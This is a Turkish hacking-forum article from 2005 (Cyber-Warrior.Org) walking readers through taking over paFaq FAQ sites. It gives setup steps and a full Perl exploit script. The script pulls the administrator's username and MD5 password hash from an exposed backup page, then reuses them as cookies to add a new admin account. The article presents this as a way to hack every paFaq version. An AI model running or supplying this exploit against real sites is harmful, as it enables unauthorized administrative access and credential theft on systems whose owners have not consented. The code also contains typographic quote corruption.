Root > Documents > Web Güvenlik Açıkları > Pafaq Sql Injection
Cyber-Warrior.Org \ Doküman \ Web Güvenlik Açıkları > Pafaq Sql Injection
Madde
  Yazar : Bilginx
  Date : 03.09.2005 05:04:30
 
# Pafaq Sql Injection
 

Pafak Sql Injection

 Kullanacagimiz Exploit ile suanki Pafaq in tum versiyonlarini hackleyebilirsiniz.
Exploit ile admin ekleyebilir ve ayni zamanda var olan admin username ve password’ünün md5

hash ini alabiliriz.


Oncelikle Perl iindiriyoruz : http://www.dzsoft.com/download/dzperl56.exe

Perl i aktif etmek icin :

http://downloads.activestate.com/ActivePerl/Windows/5.6/ActivePerl-5.6.1.635-MSWin32-x86.zip
Perl i kurarken C:\perl dizinine kuruyoruz.

Asagida yazmis oldugum exploit code sini  Not Defterine atiyoruz pafaq.nl olarak

kaydediyoruz ve Perl dosyasinin icine Bin klasorune atiyoruz.

Calistir a basip " Cmd " yaziyor sonra ise ana dizine gecmek icin :

cd..

cd..

cd perl

cd bin


Sonra  exploitimizi çalistirmak için gerekli komutu yaziyoruz.

perl pafaq.pl http://www.hedefsite.com/pafaq/

Exploitimizi calistirdiktan sonra hedef siteye user: pafaq password: pafaq olarak siteye

admin eklenmis oluyor.Sonra ise /admin/ dizinine girerek giris yapmak kaliyor.


Exploit :

#!/usr/bin/perl -w
##################################################  ########################
# paFaq 1.0 Add Administrator PoC // By James // http://www.gulftech.org
##################################################  ########################

use LWP::UserAgent;

# Set up the LWP User Agent
$ua = new LWP::UserAgent;
$ua->agent("paFaq Hash Grabber v1.0");

if ( !$ARGV[0] ) { print "Usage : pafaq.pl http://path/to/pafaq"; exit; }

my $key_time = time();

my $dbm_path = $ARGV[0] . ’/admin/backup.php’;
my $add_user = ’pafaq’; # change this?
my $add_pass = ’pafaq’; # change this?
my $add_email = [email protected] ; # change this?
my $add_path = $ARGV[0] . ’/admin/index.php?area=users&act=doadd&name=’ . $add_user .

’&password=’ . $add_pass . ’&email=’ . $add_email .
’&notify=1&can_edit_settings=1&can_edit_admins=1&can_add_admins=1&can_del_admins=1&is_a_admi

n=1’;

print "[*] Trying Host " . $ARGV[0] . "\n";

my $dbm = $ua->get($dbm_path);

if ( $dbm->content =~ /’([0-9]{1,8})’,\s’(.*)’,\s’([a-f0-9]{32})’/i)
{
        print "[+] User ID Is " . $1 . "\n";
        print "[+] User Name Is " . $2 . "\n";
        print "[+] User Password Is " . $3 . "\n";
        print "[*] Trying to add new user ...\n";

        my @cookie = (’Cookie’ => ’pafaq_user=’ . $2 . ’; pafaq_pass=’ . $3);
        my $add = $ua->get($add_path, @cookie);

        if ( $add->content =~ /has been created successfully/ )
        {
                print "[+] User $add_user Added Successfully!\n";
                print "[+] User Password Is $add_pass\n";
        }
        else
        {
                print "[!] Unable To Add User! Maybe the username is already taken? ...\n";
                print "[!] Shutting Down ...\n";
                exit;
        }
}
else
{
        print "[!] The Host Is Not Vulnerable ...\n";
        print "[!] Shutting Down ...\n";
        exit;
}
exit;__________________


Saygilar Bilginx.

Kisisel Sorulariniz icin : [email protected]
   
   
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©